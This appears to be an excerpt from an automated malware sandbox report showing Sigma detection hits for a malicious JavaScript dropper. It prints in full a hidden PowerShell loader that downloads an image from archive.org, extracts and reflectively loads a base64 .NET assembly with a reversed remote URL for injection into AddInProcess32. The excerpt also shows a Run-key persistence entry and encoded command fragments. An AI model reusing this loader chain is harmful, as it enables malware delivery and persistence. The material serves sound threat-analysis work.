?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", ProcessId: 6752, ProcessName: wscript.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\neuromo.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6800, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js", ProcessId: 5548, ProcessName: cmd.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js", ProcessId: 6752, ProcessName: wscript.exe
